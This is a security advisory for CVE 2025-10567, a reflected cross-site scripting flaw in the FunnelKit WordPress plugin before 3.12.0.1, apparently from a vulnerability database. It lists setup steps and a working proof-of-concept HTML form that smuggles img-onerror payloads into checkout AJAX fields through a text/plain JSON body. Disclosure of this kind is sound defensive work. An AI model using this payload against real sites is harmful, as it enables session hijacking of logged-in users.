FunnelKit < 3.12.0.1 – Reflected XSS | CVE 2025-10567

Description

The plugin does not sanitize user input before echoing it back in some of its checkout-related AJAX actions, allowing attackers to conduct reflected XSS attacks against logged-in users.

Proof of Concept

Make sure this plugin is installed alongside WooCommerce.

1) Create a Store Checkout by clicking on "Create Checkout" in /wp-admin/admin.php?page=bwf&path=/store-checkout

2) The default page builder is Elementor, change that to Block Editor and press "Start from blank". Choose a name of your liking.

3) Hover the resulting checkout page name, and take note of the post ID in the URL. e.g. It should look something like this:

http://vulnerable-site.tld/wp-admin/admin.php?page=bwf&path=/store-checkout/checkout/168/design where 168 is the ID you want.

4) Replace $POST_ID with the ID you have in the following PoC, as well as the targeted domain.

<form action="http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=get_gutenberg_checkout_from_data&wfacp_id=$POST_ID" 
      method="POST" 
      enctype="text/plain">
<input 
    type="hidden" 
    name='{"foo":"' 
    value='bar","wfacp_payment_method_heading_text": "\"><img src=x onerror=alert(1)>","wfacp_payment_method_subheading": "\"><img src=x onerror=alert(2)>","text_below_placeorder_btn": "\"><img src=x onerror=alert(3)>","cart_collapse_title": "\"><img src=x onerror=alert(4)>","cart_expanded_title": "\"><img src=x onerror=alert(5)>"}'>
  <button type="submit">Submit</button>
</form>